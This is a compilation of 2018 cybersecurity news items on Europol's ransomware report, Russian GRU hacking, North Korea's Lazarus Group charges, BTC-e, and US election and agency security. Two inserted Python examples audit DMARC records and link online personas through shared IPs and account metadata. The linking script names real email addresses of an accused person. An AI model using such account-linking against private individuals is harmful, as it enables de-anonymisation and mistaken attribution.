Key ransomware attacks include the so-called WannaCry and NotPetya malware, which infected hundreds of thousands of computers around the world in 2017, demanding that users pay ransoms to regain access.

"Ransomware retains its dominance," said Europol's latest annual report on cybercrime.

"In addition to attacks by financially motivated criminals, a significant volume of public reporting increasingly attributes global cyber-attacks to the actions of nation states," said the agency, based in The Hague.

The report added that it was "increasingly difficult" to tell whether an attack came from a sophisticated organised crime group, a state-sponsored actor, or a cybercrime amateur.

On September 6, the US charged a North Korean programmer with the WannaCry hack, the 2014 Sony Pictures attack and a 2016 cyber-heist on Bangladesh's central bank, alleging they were carried out on behalf of the regime in Pyongyang.

In February the United States and Britain blamed the Russian military for the "NotPetya" ransomware, calling it a Kremlin effort to destabilise Ukraine which spun out of control.

Europol said cyberattackers are also abandoning "random attacks" on mass targets in favour of tailored targeting of people and businesses "where greater potential benefits lie."

At the same time, Europol said cyberattackers who once trained their sights on traditional financial businesses were now focusing on cryptocurrencies such as Bitcoin.

However, classic internet phishing scams -- emails offering technical support, money-making schemes or romance -- "still result in a considerable number of victims," said the agency.

- 'Most disturbing' -

Europol also raised the alarm over the live streaming of child sex abuse, a growing part of what it called the "most disturbing aspect of cyber-crime."

"Live streaming of child sexual abuse remains a particularly complex crime to investigate and is likely to further increase in the future," it said.

This involved both material uploaded by offenders, and also by children who were either tricked into uploading explicit material, or made to do it through extortion.

Europol meanwhile warned that the European Union's flagship new data protection laws introduced in May were "significantly hampering the ability of investigators across the world to identify and investigate online crime."

It said ICANN, the body that administers the global domain name system, had ordered the removal of all personal data from the public WHOIS domain registration database -- formerly a key resource for police -- because publishing it did not comply with the EU law.

Europol chief Catherine De Bolle said this development "emphasises the need for law enforcement to engage with policy makers, legislators and industry, in order to have a voice in how our society develops."


Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
17.9.2018 securityaffairs

Dutch intelligence services detained two alleged Russian spies who were planning to hack a Swiss laboratory investigating the poisoning of the former spy Sergei Skripal.
According to the Dutch newspaper NRC and the Swiss daily Tages-Anzeiger, Dutch intelligence services detained two alleged agents of Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts analyses for the Organisation for the Prohibition of Chemical Weapons (OPCW), the global chemical arms watchdog; its researchers were examining samples from the poisoning of Sergei Skripal and his daughter in Salisbury.

The two allegedly carried equipment intended to break into the laboratory’s network and spy on the work of its researchers.

Russian Foreign Minister Sergei Lavrov expressed his disappointment over the detention of the two men earlier this year.

The two were detained “early this year” by Dutch military intelligence (MIVD) working together with several other countries, and then expelled from the Netherlands, the newspapers reported, according to AFP.

The decision to expel the two spies was taken by the cabinet of the Dutch Prime Minister Mark Rutte on March 26.

“The duo, according to sources within the investigation, carried equipment which they wanted to use to break into the computer network” of the Spiez laboratory.

The researchers at the Spiez Lab were analyzing samples related to poison gas attacks in Syria, as well as to the attack with the Novichok nerve agent on the Russian double agent Sergei Skripal and his daughter.

“The case of the Russian spies discovered in The Hague and then expelled from The Hague is known to Swiss authorities,” Isabelle Graber, spokeswoman for the Swiss intelligence services (SRC), told AFP.

“[The SRC] actively participated in this operation in collaboration with its Dutch and British partners in prevention of illegal actions against critical Swiss infrastructure.”

Spiez laboratory representatives confirmed that they had observed hacking attempts in recent months and had taken precautions to repel them.


Andreas Bucher, a spokesman for the Spiez lab, told AFP that in June attackers took documents from the lab’s website and “distributed a very malicious malware virus” to affiliated agencies.

The malware was the same one used in the attacks on the Pyeongchang Winter Olympics in South Korea (known as Olympic Destroyer).

According to The Washington Post, those incidents were the work of hackers at Russia’s GRU military intelligence agency, who in early February took control of some 300 computers linked to the Olympic organisation.

The attacks were seen as retaliation against the International Olympic Committee for banning the Russian team from the Winter Games over doping cases involving Russian athletes.

In April, Sergei Ivanov, head of information at Russia’s SVR foreign intelligence service, accused the OPCW of “manipulating” the results of the Skripal case.

Ivanov claimed the OPCW had omitted findings from the Spiez laboratory, asserting that the samples the OPCW sent contained a nerve agent called “BZ” that was manufactured in the West.

German Troops Face Russian 'Hybrid War' in Lithuania: Merkel
15.9.2018 securityweek BigBrothers

German Chancellor Angela Merkel said Friday Berlin was boosting military cyber capabilities to respond to Russian hybrid warfare that is targeting its troops deployed on NATO's eastern flank.

"Here you are also confronted with a situation that represents another part of the Russian military doctrine: the idea of hybrid warfare," she told German troops stationed in Lithuania as part of a NATO force deployed to deter Russia.

NATO allies have accused Russia of using "hybrid warfare" techniques, including subversion, propaganda and cyber warfare, to undermine the West without triggering a full NATO military response.

Russia has repeatedly denied that it stages such attacks and has accused the US-led alliance of provoking an arms race.

"Hybrid warfare is not something that we are very used to. You clearly experience this here in very specific ways," Merkel added, without elaborating.

"It is not for nothing that we built in Germany a special cyber unit within the German military in order to build capabilities in this area," she told troops at their base in Rukla, northwest of the capital Vilnius.

Last year, Germany deployed over 500 troops in Lithuania as part of a NATO mission to reassure eastern allies and deter Russia.

Soon after their arrival, German troops were subjected to false rape accusations while media reports said Moscow also targeted NATO soldiers' smartphones.

Fears that Russia could attempt to attack NATO's ex-communist states surged after Moscow's 2014 annexation of Crimea from Ukraine, a move that sent East-West relations to their lowest point since the Cold War.

Besides Lithuania, 1,000-strong NATO battalions were also deployed in fellow Baltic states Latvia and Estonia and neighbouring Poland.

Trump OKs Sanctions for Foreigners Who Meddle in Elections
15.9.2018 securityweek BigBrothers

President Donald Trump signed an executive order Wednesday authorizing sanctions against foreigners who meddle in U.S. elections, acting amid criticism that he has not taken election security seriously enough.

“We felt it was important to demonstrate the president has taken command of this issue, that it’s something he cares deeply about — that the integrity of our elections and our constitutional process are a high priority to him,” said national security adviser John Bolton.

In the order, the president declared a national emergency, an action required under sanctions authority, to deal with the threat of foreign meddling in U.S. elections.

The order calls for sanctioning any individual, company or country that interferes with campaign infrastructure, such as voter registration databases, voting machines and equipment used for tabulating or transmitting results. It also authorizes sanctions for engaging in covert, fraudulent or deceptive activities, such as distributing disinformation or propaganda, to influence or undermine confidence in U.S. elections.

It requires the national intelligence director to make regular assessments about foreign interference and asks the Homeland Security and Justice departments to submit reports on meddling in campaign-related infrastructure. It also lays out how the Treasury and State departments will recommend what sanctions to impose.

With the midterm elections now two months away, National Intelligence Director Dan Coats said the U.S. is not currently seeing the intensity of Russian intervention that was experienced in 2016, but he didn’t rule it out. He said the U.S. is also worried about the cyber activities of China, North Korea and Iran.

Coats said Trump’s order directs intelligence agencies to conduct an assessment within 45 days after an election to report any meddling to the attorney general and Department of Homeland Security. The attorney general and Department of Homeland Security then have another 45 days to assess whether sanctions should be imposed.

“This clearly is a process put in place to try to assure that we are doing every possible thing we can, first of all, to prevent any interference with our elections, to report on anything we see between now and the election, but then to do a full assessment after the election to assure the American people just exactly what may have happened or may not have happened,” Coats said.

Sen. Marco Rubio, R-Fla., and Sen. Chris Van Hollen, D-Md., are pushing a bill that would prohibit foreign governments from purchasing election ads, using social media to spread false information or disrupting election infrastructure. They said Trump’s order recognizes the threat, but doesn’t go far enough.

The order gives the executive branch the discretion to impose sanctions for election meddling, but the bill would spell out sanctions on key economic sectors of a country that interferes. Those backing the legislation say that under the bill, a nation would know exactly what it would face if caught.

Virginia Sen. Mark Warner, ranking Democrat on the Senate intelligence committee, said the order leaves the president with broad discretion to decide whether to impose tough sanctions. “Unfortunately, President Trump demonstrated in Helsinki and elsewhere that he simply cannot be counted upon to stand up to (Russian President Vladimir) Putin when it matters,” said Warner, who is sponsoring the bill.

At a July 16 news conference with Putin in Helsinki, Trump was asked if he would denounce what happened in 2016 and warn Putin never to do it again. Trump did not directly answer the question. Instead, he delivered a rambling response, including demands for investigation of Hillary Clinton’s email server and his description of Putin’s “extremely strong and powerful” denial of meddling.

That drew outrage from both Republicans and Democrats.

Trump has pushed back, saying that no other American president has been as tough on Russia. He has cited U.S. sanctions and the expulsion of alleged Russian spies from the U.S.

Mike Rogers, former director of the National Security Agency, said he thought Trump missed an opportunity in Helsinki to publicly scold Russia for meddling. Rogers said when he used to talk to Trump about the issue, Trump would often respond to him, saying “Mike, you know, I’m in a different place.”

Rogers said he would tell Trump: “Mr. President, I understand that, but I’m paid by the citizens of the nation to tell you what we think. Sir, this is not about politics, it’s not about parties. It’s about a foreign state that is attempting to subvert the very tenets of our structure.”

In his first public comments since he retired in June, Rogers said: “That should concern us as citizens. That should concern us leaders. And if we don’t do something, they (the Russians) are not going to stop.”

Rogers, who spoke Tuesday night at the Hayden Center at George Mason University in Virginia, also said earlier media reports claiming Trump had asked him to publicly deny any collusion between Moscow and Trump’s campaign were inaccurate.

James Clapper, the former national intelligence director who appeared with Rogers and other former intelligence officials, said he personally believes that the Russian interference did influence the outcome of the 2016 election, but didn’t elaborate.

“The Russians are still at it. They are committed to undermining our system,” Clapper said. “One of the things that really disturbs me is — that for whatever reason, I don’t know what it is — the president’s failure to dime out Putin and dime out the Russians for what they are doing.”

Greek Supreme Court Approves Russian Request for Bitcoin Suspect
14.9.2018 securityweek BigBrothers

Greece's Supreme Court on Friday said a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency should be extradited to Russia, a court source said.

Alexander Vinnik, who headed bitcoin exchange BTC-e, has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki.

The final decision is up to the Greek justice minister.

Vinnik has said he would accept extradition to Russia, where he is wanted on fraud charges totalling 9,500 euros ($11,000).

The United States and France are also seeking his extradition to face far more extensive fraud charges than in Russia.

A US court indicted Vinnik last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

The Greek Supreme Court in December had said Vinnik should be extradited to the US.

The French warrant says Vinnik had defrauded over 100 people in six French cities between 2016 and 2018.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

N. Korea Calls Sony, Wannacry Hack Charges Smear Campaign
14.9.2018 securityweek BigBrothers

PYONGYANG, North Korea (AP) — North Korea strongly denied claims by the United States that a computer programmer working for the North Korean government was involved in the hack of Sony Pictures Entertainment and the spread of the WannaCry ransomware.

In a statement Friday, a North Korean Foreign Ministry official said that the person named by U.S. is a "non-entity," and warned that the allegations, which he called a smear campaign, could harm talks between the two countries following the summit between President Donald Trump and North Korean leader Kim Jong Un.

U.S. federal prosecutors allege the programmer, identified as Park Jin Hyok, conspired to conduct a series of attacks that also stole $81 million from a bank in Bangladesh.

The U.S. believes he was working for a North Korean-sponsored hacking organization.

"The act of cybercrimes mentioned by the Justice Department has nothing to do with us," Han Yong Song, a researcher at the North Korean Foreign Ministry's Institute for American Studies, said in a statement carried by the Korean Central News Agency.

"The U.S. should seriously ponder over the negative consequences of circulating falsehoods and inciting antagonism against the DPRK that may affect the implementation of the joint statement adopted at the DPRK-U.S. summit," he said.

DPRK is short for North Korea's official name — the Democratic People's Republic of Korea.

In the statement, the North flatly denied it had anything to do with the 2014 Sony incident and the WannaCry virus, calling the U.S. charges a "vicious slander and another smear campaign."

"The U.S. is totally mistaken if it seeks to gain anything from us through preposterous falsehoods and high-handedness," the statement said.

The U.S. government has previously said North Korea was responsible for the Sony hack, which led to the release of sensitive personal information about employees, including Social Security numbers, financial records, salary information, as well as embarrassing emails among top executives.

The FBI has also long suspected North Korea was behind WannaCry, which used malware to scramble data on hundreds of thousands of computers at hospitals, factories, government agencies, banks and other businesses across the globe.

Park is charged with two counts of conspiracy to commit computer and wire fraud.

The complaint said Park was on a team of programmers employed by what it said is a government front company called Chosun Expo that operated out of Dalian, China. The Treasury Department has added his name to their sanction list, prohibiting banks that do business in the U.S. from providing accounts to him or Chosun Expo.

It is the first time the Justice Department has brought criminal charges against a hacker said to be from North Korea.

Senators Concerned About State Department's Cybersecurity Failures
14.9.2018 securityweek BigBrothers

A group of United States senators this week sent a letter to Secretary of State Mike Pompeo requesting clarifications regarding the Department of State’s failure to meet federal cybersecurity standards.

The letter was signed by senators Ron Wyden, Cory Gardner, Edward J. Markey, Rand Paul, and Jeanne Shaheen.

The lawmakers cited a recent assessment by the General Services Administration (GSA), which found that the State Department had deployed advanced access controls on only 11 percent of the agency’s devices. The senators noted that all executive branch agencies are required by law, the Federal Cybersecurity Enhancement Act, to enable multi-factor authentication (MFA) on accounts with elevated privileges.

The officials also pointed out that a report last year from the Department of State’s Inspector General found that roughly one-third of diplomatic missions “failed to conduct even the most basic cyber threat management practices, like regular reviews and audits.” The same report noted that experts managed to exploit vulnerabilities in the agency’s email accounts, applications and operating systems during the tests they conducted.

“We are sure you will agree on the need to protect American diplomacy from cyber attacks, which is why we have such a hard time understanding why the Department of State has not followed the lead of many other agencies and complied with federal law requiring agency use of MFA,” the senators wrote.

The letter instructs the Department of State to provide information on the actions taken in response to the Office of Management and Budget (OMB) designating its cyber readiness as “high risk,” to clarify what actions it has taken to address the absence of MFA on high-privilege accounts, and to provide statistics for the past three years regarding the number of attacks launched against State Department systems located abroad.

“It is not surprising in that there is no stopping the ‘Bring Your Own Device’ train — not even our most sensitive federal agency can stop it. As a result, federal agencies are not immune from the cyber-security risks that the private sector has been grappling with for years — except when it comes to having to pay fines, defense costs, and large damage awards (not to mention losses from customer defections),” Todd Shollenbarger, COO of biometric technology company Veridium, said via email.

“For our federal government, no amount of ‘budgetary pressures’ (or other excuse) should be tolerated when it comes to failing to have utilized a basic cybersecurity technique, such as 2FA or MFA — especially since ‘user convenience’ is not the overriding concern. The good news is that NIST’s recently updated Digital Identity Guidelines (Special Publication 800-63-3) has done much of the hard work. What’s now needed — obviously — is for our federal government agencies to use it,” Shollenbarger added. “But remember: not all MFA solutions are built the same.”

Last year, the DHS issued Binding Operational Directive (BOD) 18-01, instructing all federal agencies to deploy web and email security technologies such as HTTPS, STARTTLS and DMARC.

A report published this summer by email threat protection company Agari revealed that over half of agencies had fully implemented the DMARC email security standard. However, the Department of State had only implemented DMARC on 9 of its 19 domains and was among the worst-performing agencies in this regard.
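What "fully implemented" means for DMARC is a matter of the published record, not just its existence: a domain can publish a record whose policy is p=none, apply an enforcing policy to only a fraction of mail via pct=, or leave subdomains unenforced via sp=. The following is an added example, not code from DHS, Agari or the State Department, that parses DMARC TXT records and classifies each domain against the BOD 18-01 end state of p=reject. The domains and records in SAMPLE_RECORDS are constructed; a live check would fetch the TXT record at _dmarc.<domain> instead.

```python
"""Audit DMARC records against the BOD 18-01 end state (p=reject on every domain).

Added example, not code from DHS, Agari or the State Department. The domains
and TXT records in SAMPLE_RECORDS are constructed for illustration; a live
check would fetch the TXT record at _dmarc.<domain> instead.
"""

_POLICIES = {"none": 0, "quarantine": 1, "reject": 2}   # weakest to strongest


def parse_dmarc(txt):
    """Parse a DMARC TXT record such as "v=DMARC1; p=reject; rua=mailto:..."
    into a dict of tag -> value.

    Raises ValueError for records a receiver would ignore: v=DMARC1 must be
    the first tag and p= must carry a valid policy (RFC 7489, section 6.3).
    """
    tags = {}
    order = []
    for chunk in txt.split(";"):
        chunk = chunk.strip()
        if not chunk:
            continue
        if "=" not in chunk:
            raise ValueError("malformed tag: %r" % chunk)
        key, value = chunk.split("=", 1)
        key = key.strip().lower()
        tags[key] = value.strip()
        order.append(key)
    if not order or order[0] != "v" or tags["v"] != "DMARC1":
        raise ValueError("record must start with v=DMARC1")
    if tags.get("p") not in _POLICIES:
        raise ValueError("missing or invalid p= policy")
    return tags


def enforcement_level(tags):
    """Classify a parsed record as 'none', 'partial', 'quarantine' or 'reject'.

    'partial' means an enforcing policy that is diluted: pct= below 100, or a
    sp= subdomain policy weaker than the organisational policy.
    """
    policy = tags["p"]
    pct = int(tags.get("pct", "100"))
    if not 0 <= pct <= 100:
        raise ValueError("pct out of range")
    subdomain_policy = tags.get("sp", policy)
    if subdomain_policy not in _POLICIES:
        raise ValueError("invalid sp= policy")
    if policy == "none":
        return "none"
    if pct < 100 or _POLICIES[subdomain_policy] < _POLICIES[policy]:
        return "partial"
    return policy


def audit(records):
    """records: domain -> TXT string, or None when no _dmarc record exists.
    Returns domain -> 'missing', 'invalid' or an enforcement level."""
    results = {}
    for domain, txt in records.items():
        if txt is None:
            results[domain] = "missing"
            continue
        try:
            results[domain] = enforcement_level(parse_dmarc(txt))
        except ValueError:
            results[domain] = "invalid"
    return results


def fully_implemented(results):
    """Domains that meet the BOD 18-01 end state: p=reject applied to all mail."""
    return sorted(d for d, level in results.items() if level == "reject")


# Constructed records for a hypothetical agency; none of these domains is real.
SAMPLE_RECORDS = {
    "mail.agency-a.example": "v=DMARC1; p=reject; rua=mailto:dmarc@agency-a.example",
    "agency-a.example": "v=DMARC1; p=quarantine; pct=25; rua=mailto:dmarc@agency-a.example",
    "legacy.agency-a.example": "v=DMARC1; p=none; rua=mailto:dmarc@agency-a.example",
    "reports.agency-a.example": "v=DMARC1; p=reject; sp=none",
    "portal.agency-a.example": None,                                      # no _dmarc record published
    "old.agency-a.example": "v=spf1 include:_spf.agency-a.example -all",  # SPF record pasted at _dmarc
}

if __name__ == "__main__":
    results = audit(SAMPLE_RECORDS)
    for domain, level in sorted(results.items()):
        print("%-28s %s" % (domain, level))
    print("fully implemented:", fully_implemented(results))
```

Only one of the six constructed domains counts as fully implemented; the others show the states a domain-count survey has to distinguish. Treating p=reject with sp=none or pct below 100 as "partial" is a deliberate choice here, since an attacker spoofing a subdomain or landing in the unenforced percentage gets the same result as no policy at all.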

Georgia Extradites Russian Data Theft Suspect to US
10.9.2018 securityweek BigBrothers

A 35-year-old Russian was extradited to the United States from Georgia on Friday to answer criminal charges over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.

Andrei Tyurin is accused of orchestrating major hacking crimes against US financial institutions, brokerage firms and financial news publishers, including the largest theft of customer data from a US financial institution.

US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.

The scheme compromised data from millions of customers of JPMorgan Chase and other firms, previously identified as the Dow Jones media group and online brokers ETrade and Scottrade.

Tyurin, originally from Moscow, was arrested in Georgia at the request of US authorities, US officials said.

He faces 10 charges on multiple conspiracy counts, as well as wire fraud, aggravated identity theft and four counts of computer hacking. The most serious charges carry a maximum sentence of 30 years in prison.

Three other purported co-conspirators, Israeli citizens Gery Shalon and Ziv Orenstein, and American Joshua Aaron were arrested in 2015 and 2016.

Tyurin will appear before a Manhattan federal court later on Friday, with another scheduled court hearing on September 25, US prosecutors said.

His alleged hacking activities "lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims," said US Attorney Geoffrey Berman.

Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US
8.9.2018 securityaffairs BigBrothers

Andrei Tyurin, the Russian citizen accused of being responsible for major cyber attacks against financial institutions including JPMorgan Chase, has been extradited to the United States from Georgia.
Tyurin (35) was extradited on Friday to face charges over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.

The man was arrested in Georgia at the request of US authorities; he faces 10 charges, including multiple conspiracy counts, wire fraud, aggravated identity theft and four counts of computer hacking.

Andrei Tyurin is accused of being the mastermind of the organization that targeted US financial institutions from 2012 to mid-2015.

“US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.” states the AFP.

Crooks compromised data from millions of customers of financial firms, including JPMorgan Chase, the Dow Jones media group, and ETrade and Scottrade brokers.

According to the US Attorney Geoffrey Berman, Tyurin and his accomplices’ activities “lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims,”

The other members of the gang, the American Joshua Aaron and the Israeli citizens Gery Shalon and Ziv Orenstein, were already arrested in 2015 and 2016.

Tyurin appeared before a Manhattan federal court on Friday; the next hearing is scheduled for September 25.

Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks
8.9.2018 securityweek BigBrothers

A 34-year-old North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the Lazarus Group. An affidavit filed by an FBI special agent reveals how investigators linked the man to the notorious threat actor.

Park Jin Hyok has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint, filed on June 8 and made public on Thursday, describes both successful and unsuccessful campaigns of the Lazarus Group, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Governments and members of the cybersecurity industry previously linked most of these attacks to North Korea and the Lazarus Group (aka Hidden Cobra) based on shared code and infrastructure. However, the criminal complaint made public on Thursday reveals the apparent operational security (opsec) mistakes that led to investigators accusing Park of being involved in the campaigns.

Park is a North Korean programmer who until 2014, just before the Lazarus attack on Sony, worked in the China-based offices of Chosun Expo Joint Venture, also known as Korea Expo Joint Venture or KEJV. The company, which is said to be a front for the North Korean government, has been linked to the country’s military intelligence and it allegedly supports Pyongyang’s cyber activities.

According to investigators, Park worked at KEJV’s offices in Dalian, Liaoning, China, a province that borders North Korea. A résumé discovered by agents showed that he had been employed as a developer and that he had programming skills in – among many others – Visual C++, the language used to create many of Lazarus’ tools.

One of the personas used by Lazarus to set up its operations was “Kim Hyon Woo” and several links have been found between this moniker and Park’s online activities, including shared access to files, common names, and common IP addresses.

Links between Park Jin Hyok and Lazarus Group

Agents discovered that one of the email accounts used by Park, ttykim1018(at)gmail.com, and one account used by Kim Hyon Woo, tty198410(at)gmail.com, both had the “tty” string in their names.

But that’s not the only connection. One email had been added to the other’s address book and the Kim Hyon Woo address was the only one allowed to access an archive file saved in a remote file storage account associated with Park’s address.

Park’s address was also used to register a video account that shared profile information with a video account and a payment account created by Kim Hyon Woo.

Lazarus’ tty198410 account was used to register a Gmail account named mrkimjin123(at)gmail.com. This address is noteworthy as it incorporates both the Kim and Jin names.

Another email address, which Park apparently used for official KEJV communications, surigaemind(at)hotmail.com, received and sent messages addressed to and signed by a “Mr. Kim Jin” and “Kim Jin.”

Another important piece of evidence linking Park’s KEJV and personal accounts to Lazarus operational accounts registered by the Kim Hyon Woo persona is the discovery of common IP addresses – based in North Korea and elsewhere – that were used to access the accounts.

Investigators also discovered that the Brambul malware, which the U.S. recently attributed to Hidden Cobra, used various collector email accounts to store information stolen from compromised devices. The same North Korean IP address was used to access one of the Brambul collector accounts and KEJV-linked email accounts.

The complaint also reveals that Park is not the only subject of the FBI’s investigation into the Lazarus attacks and he likely was not the only individual with access to the analyzed accounts.
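The linking described above is graph work: accounts are nodes, and a shared source IP, an address-book entry, a registration relationship or shared access to a stored file is an edge; the persona cluster is whatever is reachable from a known account. The block below is an added example of that technique, not the FBI's tooling, and reproduces no evidence from the complaint. Only the four address names quoted in the article are real; the login records, the IP addresses (taken from the RFC 5737 documentation ranges), the collector address and the unrelated account are constructed.

```python
"""Cluster personas by pivoting on shared IP addresses and account metadata.

Added example of the linking technique described above; it is not the FBI's
tooling and reproduces no evidence from the complaint. Only the four address
names quoted in the article are real; the login records, IP addresses (RFC 5737
documentation ranges), the collector address and the unrelated account are
constructed.
"""
from collections import defaultdict
from itertools import combinations

# Constructed (account, source IP) pairs of the kind a provider returns for a warrant.
ACCESS_LOG = [
    ("ttykim1018@gmail.com", "192.0.2.10"),
    ("ttykim1018@gmail.com", "198.51.100.7"),
    ("tty198410@gmail.com", "192.0.2.10"),
    ("tty198410@gmail.com", "203.0.113.5"),
    ("mrkimjin123@gmail.com", "203.0.113.5"),
    ("surigaemind@hotmail.com", "192.0.2.10"),
    ("collector-hypothetical@example.com", "192.0.2.10"),   # hypothetical malware drop-box account
    ("unrelated.user@example.com", "198.51.100.200"),
]

# Constructed non-IP relationships, each with the reason it counts as a link.
DIRECT_LINKS = [
    ("ttykim1018@gmail.com", "tty198410@gmail.com", "listed in address book"),
    ("tty198410@gmail.com", "mrkimjin123@gmail.com", "used to register account"),
]


def shared_ips(log):
    """IP -> accounts seen from it, keeping only IPs used by two or more accounts."""
    seen = defaultdict(set)
    for account, ip in log:
        seen[ip].add(account)
    return {ip: accts for ip, accts in seen.items() if len(accts) > 1}


def build_graph(log, links):
    """Undirected graph account -> {neighbour -> [reasons]}; every account in
    the log is a node even if nothing links to it."""
    graph = defaultdict(lambda: defaultdict(list))
    for account, _ in log:
        graph[account]
    for ip, accts in shared_ips(log).items():
        for a, b in combinations(sorted(accts), 2):
            graph[a][b].append("shared IP " + ip)
            graph[b][a].append("shared IP " + ip)
    for a, b, reason in links:
        graph[a][b].append(reason)
        graph[b][a].append(reason)
    return graph


def cluster(graph, start):
    """All accounts reachable from start: the candidate persona cluster.
    Every edge counts equally here; in practice a shared consumer NAT or VPN
    exit can join unrelated accounts, so the reasons on each edge must be
    reviewed before drawing conclusions."""
    seen, stack = {start}, [start]
    while stack:
        node = stack.pop()
        for nxt in graph[node]:
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def common_local_substring(addr_a, addr_b, min_len=3):
    """Longest common substring of the two local parts ('' if shorter than
    min_len). Weak evidence on its own, but it is how overlaps such as 'tty'
    surface in the first place."""
    a, b = addr_a.split("@")[0], addr_b.split("@")[0]
    best = ""
    for i in range(len(a)):
        for j in range(len(b)):
            k = 0
            while i + k < len(a) and j + k < len(b) and a[i + k] == b[j + k]:
                k += 1
            if k > len(best):
                best = a[i:i + k]
    return best if len(best) >= min_len else ""


if __name__ == "__main__":
    g = build_graph(ACCESS_LOG, DIRECT_LINKS)
    for acct in sorted(cluster(g, "ttykim1018@gmail.com")):
        print(acct, dict(g[acct]))
    print(common_local_substring("ttykim1018@gmail.com", "tty198410@gmail.com"))
```

On the constructed data the cluster reachable from the ttykim1018 account contains the persona, the registration-linked address, the KEJV work address and the drop-box account, while the unrelated account stays isolated. The value of keeping a list of reasons per edge is that an analyst can see whether a link rests on one shared IP or on several independent observations, which is the difference between a lead and an attribution.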

Homeland Security Head: Colorado Tops US in Vote Security
8.9.2018 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kirstjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among them, she said, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. It's standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

It's invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it's required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."

Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.2018 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

